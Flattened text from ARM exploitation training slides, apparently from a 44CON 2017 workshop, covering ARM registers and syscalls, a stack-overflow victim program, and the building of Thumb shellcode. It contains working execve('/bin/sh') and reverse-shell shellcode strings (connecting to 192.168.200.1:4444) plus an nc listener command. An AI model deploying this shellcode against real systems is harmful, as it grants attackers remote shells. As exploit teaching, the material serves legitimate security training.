CEO Net-square.
Hacker, Speaker, Trainer,
Author.
M.S. Computer Science
Purdue University.
LinkedIn: saumilshah
Twitter: @therealsaumil
Hacker
Offensive Security
Reverse Engineering
Malware Research
ARM Tutorials
Azeria-Labs
Twitter: @Fox0x01
but an ARM in
every pocket.
RISC CPU
Load/Store architecture.
32bit ARM mode / 16bit Thumb mode.
Conditional Execution (ARM mode only).
Inline Barrel Shifter.
Fully aligned memory access.
Bi-Endian (Data).
R0 Accumulator R8
R1 R9
R2 R10
R3 R11 FP Frame Pointer (if used)
R4 R12 IP Intra Procedural Call scratch register
R5 R13 SP Stack Pointer
R6 R14 LR Link Register
R7 Syscall Number R15 PC Program Counter
CPSR Current Program Status Register
31 30 29 28 27 24 9 8 7 6 5 4 0
N Z C V Q J GE E A I F T M
privilege mode
Abort disable
Endianness
IRQ disable
FIQ disable
Greater 10000 = User
underflow
oVerflow
Negative
Thumb
Jazelle
10011 = SVC
Equal for
10001 = FIQ
SIMD 10010 = IRQ
10111 = Abort
11011 = Undefined
mov r0, #5 r0 = 5
addgt r2, r1, #3 if greater than, r2 = r1 + 3
movs r1, r2 r1 = r2, update CPSR
NETSQUARE 44CON 2017 (c) SAUMIL SHAH
ARM Assembler Conventions
#N decimal integer
0xN hexadecimal integer
0bN binary integer
_start:
.code 32
// code goes here Inspecting the assembled code
bkpt
objdump -d program.o
32 bits
0x8108 ...
0x810c ...
0x8110 ...
Intel x86
PUSH parameters on the stack
MOV EAX, syscall_number
SYSENTER / INT 80
ARM
r0, r1, ..., r6 parameters loaded in registers
MOV r7, syscall_number
SVC #0
Return value in r0
NETSQUARE 44CON 2017 (c) SAUMIL SHAH
Example: write()
victim1.c
int main(int argc, char *argv[])
{
if(argc > 1)
func1(argv[1]);
}
pc = 0x41414140
sp
bx sp
A A A A A A A A A A ... A A A A A A A A A A pc SHELLCODE...
sp
0xb6ea1531
bx sp
switch to Thumb mode
sp
r0 "/bin/sh"
syscall 11
r1 0 (NULL)
r2 0 (NULL)
r7 11 (syscall number)
svc #0
.code 16
add r0, pc, #8
sub r1, r1, r1
mov r2, r1
strb r2, [r0, #7]
mov r7, #11
svc #1
write a NULL
.ascii "/bin/shX" byte at the end
of "/bin/shX"
r0
shellcode
2. Link as RWX ELF ld -N shellcode.o -o shellcode.elf
binary
3. Extract RAW objcopy -O binary shellcode.elf
shellcode.bin
assembly
4. Derive a hex hexdump -v -e '"\\" 1/1 "x%02x"'
shellcode.bin
encoded string -OR-
./hex_encode.pl shellcode.bin
connect
nc -l -p 4444 socket
1 - STDOUT
2 - STDERR
0 STDIN
execve
"/bin/sh"
listener
execve("/bin/sh", 0, 0);
addr: "\x02\x00\xPP\xPP\xAA\xAA\xAA\xAA"
Protocol Port IP Address (big endian)
"\x02\x00\x11\x5c\xc0\xa8\xc8\x01"
4444 192.168.200.1
dup2(sd, 0)
dup2(sd, 1)
dup2(sd, 2)
execve("/bin/sh", 0, 0)
$shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x92\x1a
\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46/bin/shX";
shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x92\x1a
\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46/bin/shX"
$shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21
\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0b\xa1\x4a\x70\xca\x73
\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c
\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x52\x40\x05\xb4
\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\xff" . pack("n", 4444) .
chr(192) . chr(168) . chr(200) . chr(1) . "/bin/shX";
shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21
\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0b\xa1\x4a\x70\xca\x73
\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c
\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x52\x40\x05\xb4
\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\xff" + pack(">H", 4444) +
chr(192) + chr(168) + chr(200) + chr(1) + "/bin/shX"
Blog:
http://blog.exploitlab.net